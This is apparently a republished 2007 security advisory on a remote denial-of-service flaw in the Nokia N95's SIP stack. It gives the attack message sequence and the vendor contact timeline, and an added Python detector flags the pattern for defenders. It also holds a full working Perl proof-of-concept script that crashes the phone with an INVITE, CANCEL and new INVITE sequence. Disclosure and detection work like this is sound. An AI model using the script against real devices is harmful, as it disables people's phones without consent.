
nokia-dos.txt

06 Dec 2007 | Reported by Radu State | Type: packetstorm | Source: packetstormsecurity.com

Nokia N95 remote DoS vulnerability via SIP Stack

Nokia N95 cellphone remote DoS using the SIP Stack

Severity:
High – Denial of Service

Hardware:
Nokia N95

Firmware:
Tested version: Nokia RM-159 V 12.0.013

Notification:
Vulnerability found: 11 September 2007
Contact Nokia Support: 12 September 2007 / no reply
Contact Nokia Security Support: 19 September 2007 / no reply

Vulnerability Synopsis:
If the device has the SIP Phone client activated, a sequence of SIP messages
puts the device into an inconsistent state in which the user is no longer
able to operate it until it reboots.

The sequence of messages consists of two different SIP dialogs: the first
initiates an INVITE transaction but immediately closes it (cancelling it
before it completes), while the second initiates a normal INVITE transaction,
which triggers the vulnerability on the target.

The sequence of messages is illustrated below.

X ------------------------- INVITE -----------------------> Nokiav12
X <---------------------- 100 Trying ---------------------- Nokiav12
X ------------------------- CANCEL -----------------------> Nokiav12
X <----------------- OK (to the Cancel) ------------------- Nokiav12
X <---------------- 487 Request Terminated ---------------- Nokiav12

--------New Dialog--------

X ------------------------- INVITE -----------------------> Nokiav12
X <---------------------- 100 Trying ---------------------- Nokiav12
X <---------------------- 180 Ringing --------------------- Nokiav12

---- The device does not work properly anymore ----
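The two-dialog sequence above is what a defender would want to recognise on the wire. The Python detector below is an added example and is not part of the advisory or of the Madynes team's code: it parses raw SIP requests, tracks INVITE transactions per source address, and raises an alert when a source CANCELs an INVITE it has just opened and then starts a second INVITE dialog (new Call-ID) within a short window, the shape of the sequence shown. It also flags a CANCEL whose To header differs from the INVITE it cancels, which RFC 3261 section 9.1 requires to be identical; the advisory's own PoC script sends its CANCEL with a To tag the INVITE did not carry. The sample messages, the 192.0.2.x addresses, the Call-IDs and the 5-second window are all constructed for this example.

```python
from collections import defaultdict

CRLF = "\r\n"


def parse_sip(raw):
    """Split a raw SIP message into (method, status, headers, body).

    method is set for requests and status (an int) for responses; header
    names are lower-cased. Compact header forms are not expanded, which is
    enough for the constructed messages in this example.
    """
    head, _sep, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    start = lines[0].split(" ", 2)
    if start[0] == "SIP/2.0":
        method, status = None, int(start[1])
    else:
        method, status = start[0], None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, status, headers, body


class AbortedInviteDetector:
    """Per-source tracker for the INVITE / CANCEL / new-INVITE pattern.

    Alerts when a source CANCELs an INVITE it opened and then starts a
    second INVITE dialog within `window` seconds, and when a CANCEL's To
    header differs from that of the INVITE it cancels (RFC 3261 section 9.1
    requires them to be identical).
    """

    def __init__(self, window=5.0):
        self.window = window
        self.invites = {}                 # Call-ID -> (src, ts, To header)
        self.aborted = defaultdict(list)  # src -> timestamps of its CANCELs
        self.alerts = []

    def feed(self, ts, src, raw):
        """Process one request seen from `src` at time `ts`; returns alerts so far."""
        method, _status, hdr, _body = parse_sip(raw)
        call_id = hdr.get("call-id")
        if method == "INVITE":
            recent = [t for t in self.aborted[src] if 0 <= ts - t <= self.window]
            if recent and call_id not in self.invites:
                self.alerts.append(
                    f"{src}: new INVITE dialog {call_id} {ts - recent[-1]:.1f}s "
                    f"after it cancelled a fresh INVITE")
            self.invites[call_id] = (src, ts, hdr.get("to"))
        elif method == "CANCEL":
            inv = self.invites.get(call_id)
            if inv and inv[0] == src:
                self.aborted[src].append(ts)
                if inv[2] != hdr.get("to"):
                    self.alerts.append(
                        f"{src}: CANCEL for {call_id} has To {hdr.get('to')!r}, "
                        f"INVITE had {inv[2]!r}")
        return self.alerts


def build_request(method, call_id, to_tag=""):
    """Constructed sample request (not a capture) mirroring the advisory's headers."""
    return CRLF.join([
        f"{method} sip:target@192.0.2.10 SIP/2.0",
        "Via: SIP/2.0/UDP 192.0.2.20;branch=z9hG4bK1",
        "From: <sip:x@192.0.2.20>;tag=1",
        f"To: <sip:target@192.0.2.10>{to_tag}",
        f"Call-ID: {call_id}@192.0.2.20",
        f"CSeq: 1 {method}",
        "Content-Length: 0",
    ]) + CRLF + CRLF


def run_advisory_sequence(gap=1.0, cancel_to_tag=";tag=1"):
    """Replay the advisory's two dialogs from one source: INVITE, CANCEL,
    then a second INVITE `gap` seconds later. Returns the alerts raised."""
    det = AbortedInviteDetector(window=5.0)
    src = "192.0.2.20"
    det.feed(0.0, src, build_request("INVITE", "dialog1"))
    det.feed(0.1, src, build_request("CANCEL", "dialog1", cancel_to_tag))
    det.feed(0.1 + gap, src, build_request("INVITE", "dialog2"))
    return det.alerts


if __name__ == "__main__":
    for alert in run_advisory_sequence():
        print(alert)
```

Fed the advisory's sequence with a one-second gap, the detector returns two alerts (the mismatched To on the CANCEL, then the second INVITE opened right after the aborted one); with the same gap stretched to a minute only the To mismatch remains, and a well-formed CANCEL followed by a distant INVITE produces nothing. In practice the window and the per-source keying (address only here; add the From URI if the phone sits behind a registrar) are the tuning points.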
  
  
  
Impact:
A remote entity can take down all the services of the cell phone.

Resolution:
As we did not get any proper reply from Nokia on the subject, the best
course of action is to disable the SIP client.

Credits:
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF, the Madynes VoIP fuzzer.

http://madynes.loria.fr/

Proof of Concept:

A perl script (nokiav12.pl) is attached to this mail. Before launching
it, the SIP phone has to be initialised on the target device.

Command:

perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>

Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
  
  
  
  
  
```perl
#!/usr/bin/perl
##################################################
# Vulnerability discovered using KiF ~ Kiph      #
#                                                #
# Authors:                                       #
# Humberto J. Abdelnur (Ph.D Student)            #
# Radu State (Ph.D)                              #
# Olivier Festor (Ph.D)                          #
#                                                #
# Madynes Team, LORIA - INRIA Lorraine           #
# http://madynes.loria.fr                        #
##################################################

use strict;
use warnings;
use IO::Socket::INET;
use String::Random;

die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>\n"
    unless ($ARGV[3]);

my $targetIP     = $ARGV[0];
my $targetUser   = $ARGV[1];
my $attackerIP   = $ARGV[2];
my $attackerUser = $ARGV[3];

# UDP socket bound to the standard SIP port, pointed at the target's SIP port
my $socket = IO::Socket::INET->new(
    Proto     => 'udp',
    PeerPort  => 5060,
    PeerAddr  => $targetIP,
    LocalPort => 5060,
) or die "Cannot create socket: $!";

my $foo    = String::Random->new;
my $callid = $foo->randpattern("CCccnCn");   # random Call-ID for the first dialog
my $cseq   = $foo->randregex('\d\d\d\d');    # random CSeq number

# SDP offer carried by both INVITEs; each line ends in CRLF ("\r" plus the
# literal newline that follows it in the string)
my $sdp = "v=0\r
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
s=-\r
c=IN IP4 $attackerIP\r
t=0 0\r
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
a=sendrecv\r
a=ptime:20\r
a=maxptime:200\r
a=fmtp:96 mode-change-neighbor=1\r
a=fmtp:18 annexb=no\r
a=fmtp:98 0-15\r
a=rtpmap:96 AMR/8000/1\r
a=rtpmap:0 PCMU/8000/1\r
a=rtpmap:8 PCMA/8000/1\r
a=rtpmap:97 iLBC/8000/1\r
a=rtpmap:18 G729/8000/1\r
a=rtpmap:98 telephone-event/8000/1\r
a=rtpmap:13 CN/8000/1\r
";

my $sdplen = length $sdp;

# First dialog: a normal INVITE carrying the SDP offer
my $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);

# Wait until the 100 Trying provisional response arrives
my $text = '';
while (not $text =~ /^SIP\/2.0 100(.\r\n)*/) {
    $socket->recv($text, 1024, 0);
}

# ... then cancel the transaction immediately. The To header carries tag=1,
# which the INVITE did not have (RFC 3261 section 9.1 requires the two To
# headers to match); kept exactly as in the original script.
$msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>;tag=1\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq CANCEL\r
Max-Forwards: 70\r
Content-Length: 0\r
\r
";
$socket->send($msg);

sleep(1);   # the original read "time.sleep(1)" (Python); Perl's sleep() is what was meant

# Second dialog: fresh Call-ID and CSeq, then a normal INVITE
$callid = $foo->randpattern("CCccnCn");
$cseq   = $foo->randregex('\d\d\d\d');
$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
From: <sip:$attackerUser\@$attackerIP>;tag=2\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq INVITE\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Max-Forwards: 70\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);
```
  
  
  
  
  
  
  
  
